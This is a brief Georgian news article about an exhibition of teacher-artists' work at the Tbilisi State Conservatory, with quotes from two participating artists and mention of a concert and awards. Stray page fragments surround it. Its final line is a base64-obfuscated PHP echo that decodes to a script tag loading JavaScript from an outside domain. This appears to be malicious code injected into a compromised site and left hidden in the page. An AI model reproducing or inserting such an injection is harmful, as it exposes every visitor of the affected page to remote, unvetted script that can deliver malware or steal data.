celsiusi
ავერსი შნაიდერი
10 ივლისს,  ვანო სარაჯიშვილის სახელობის თბილისის სახელმწიფო კონსერვატორიის საგამოფენო სივრცეში და დიდ საკონცერტო დარბაზში  გაიმართა  პედაგოგი-მხატვრების ნამუშევართა გამოფენა. 
 
ამის შესახებ საინფორმაციო სააგენტო BUSINESS TIME გამოფენაში მონაწილე მხატვარ–პედაგოგებს ნინო იოსავას და თეა გამხიტაშვილს ესაუბრა. 
 
"გამოფენაში მონაწილეობას ღებულობენ პედაგოგ-მხატვრები, როგორც თბილისის ხელოვნების სკოლების სამხატვრო განყოფილებების, კერძო სამხატვრო სტუდიების, სამხატვრო წრეების, ასევე, საქართველოს ყველა რეგიონიდან, რაც ძალიან სასიამოვნო და მისასალმებელია, ხელოვანი ადამიანების სწორედ ამგვარი გაერთიანება ხდის ამ გამოფენას ასეთ საინტერესოს და ორიგინალურს" – განაცხადა თეა გამხიტაშვილმა. 
 
 
"უდაოდ კარგი პროექტია, რადგან სრულიად განსხვავებული ხედვის და შემოქმედებითი ნიჭის მქონე ადამიანების ერთობლიობა და მათი ცალკეული ნამუშევრები, ერთ სივრცეში თავმოყრილი, სასიამოვნო და საინტერესო შედეგს დებს. ამასთან, ამგვარი დაფასება ხელოვანი პედაგოგების იწვევს მადლიერების გრძნობას და ზრდის მოტივაციას,"– განაცხადა ნინო იოსავამ.  
 
აღსანიშნავია, რომ გამოფენის დასასრულს  გაიმართა კონცერტი და დაჯილდოების ცერემონიალი, სადაც მომღერალმა ირმა სოხაძემ და სხვა მუსიკოსებმა, სტუმრებს სასიამოვნო განწყობა შეუქმნეს. 
 
პროექტი –„გაიცანით პედაგოგი-მხატვრები" უკვე 5 წელია ტარდება და მისი მხარდამჭერია თბილისის მერია. ღონისძიების ორგანიზატორია - შპს „კრეატივი-2020". 
 
 
722
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");